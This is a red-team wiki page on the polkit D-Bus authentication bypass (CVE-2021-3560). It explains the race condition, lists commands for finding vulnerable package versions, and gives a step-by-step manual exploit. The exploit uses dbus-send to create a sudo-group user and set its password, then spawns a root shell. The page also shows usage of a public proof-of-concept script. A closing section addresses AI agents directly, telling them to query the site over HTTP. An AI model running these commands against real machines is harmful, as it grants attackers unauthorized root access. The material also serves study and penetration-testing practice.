# D-Bus Authentication Bypass

## Theory

The vulnerability can be boiled down to these steps:

1. The attacker manually sends a dbus message to the accounts-daemon requesting the creation of a new account with sudo permissions (or latterly, a password to be set for the new user). This message gets given a unique ID by the dbus-daemon.
2. The attacker kills the message after polkit receives it, but before polkit has a chance to process the message. This effectively destroys the unique message ID.
3. Polkit asks the dbus-daemon for the user ID of the user who sent the message, referencing the (now deleted) message ID.
4. The dbus-daemon can't find the message ID because we killed it in step two. It handles the error by responding with an error code.
5. Polkit mishandles the error and substitutes in 0 for the user ID -- i.e. the root account of the machine.<br>
6. Thinking that the root user requested the action, polkit allows the request to go through unchallenged.

In short, by destroying the message ID before the dbus-daemon has a chance to give polkit the correct ID, we exploit the poor error-handling in polkit to trick the utility into thinking that the request was made by the all-powerful root user. - [TryHackMe](broken://spaces/hhJPQlmTdlPBQjXz6mN2/pages/DR79PxBPUbR3EGAMAFwG)

See the full vulnerability explain on the official [Kevin Backhouse article](https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/).

## Practice

{% tabs %}
{% tab title="Enumeration" %}
Many of the most popular Linux distributions didn’t ship the vulnerable version until more recently. You may run Polkit exploit on the following targets:

* RHEL 8
* Fedora 21 (or later)
* Debian testing (“bullseye”)
* Ubuntu 20.04
* LTS ("Focal Fossa")

Others may also be vulnerables if you find that the installed polkit package is vulnerable. Affected versions are **0.113** (or later) for `rhel,centos,fedora` and **0.105-26** for `Debian/Ubuntu`

```bash
#Debian/Ubuntu
apt list --installed | grep policykit-1
dpkg -l | grep -i polkit|grep -i "0.105-26"

#RHEL/CentOs/Fedora
rpm -qa | grep -i polkit|grep -i '0.11[3-9]'
```

Additionally, This exploit works only on distributions that have installed `accountsservice` and `gnome-control-center`

```bash
#Debian/Ubuntu
dpkg -l  | grep -i 'accountsservice'
dpkg -l  | grep -i 'gnome-control-center'

#RHEL/CentOs/Fedora
rpm -qa  | grep -i 'accountsservice'
rpm -qa  | grep -i 'gnome-control-center'
```

{% endtab %}

{% tab title="Manual Exploit" %}
First, send a dbus message to create a new user

<pre class="language-bash"><code class="lang-bash"># string:pwned: The new user named "pwned".
# string:"Account Desc": The description of the new user.
# int32:1: sudo group
<strong>$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:pwned string:"Account Desc" int32:1 &#x26; sleep 0.005s; kill $!
</strong>
<strong>#Check if it worked
</strong>$ id pwned
uid=1000(pwned) gid=1000(pwned) groups=1000(pwned),27(sudo)
</code></pre>

Second, generate password and set it with a dbus message

```bash
# Generate SHA512 password (-6)
openssl passwd -6 password123

#Dbus message
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'<password_hash>' string:'Ask the tester' & sleep 0.005s; kill $!
```

Third, we can login into this new account and spawn a privileged shell

```bash
#Switch
user$ su - pwned

#Spawn root shell
pwned$ sudo su root
```

{% endtab %}

{% tab title="Auto Exploit" %}
To automate this processus, we can use [this exploit](https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation) made by Secnigma.

```bash
# Add user with creds secnigma:secnigmaftw
./poc.sh

# Add your own user
./poc.sh -u=MyUser -p=MyPassword
```

{% hint style="danger" %}
Do not run this script in graphical login
{% endhint %}
{% endtab %}
{% endtabs %}

## Ressource

{% embed url="<https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/>" %}

{% embed url="<https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/polkit-privilege-escalation/#cve-2021-3560>" %}

{% embed url="<https://tryhackme.com/room/polkit>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://red.infiltr8.io/redteam/privilege-escalation/linux/polkit-exploits/d-bus-authentication-bypass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.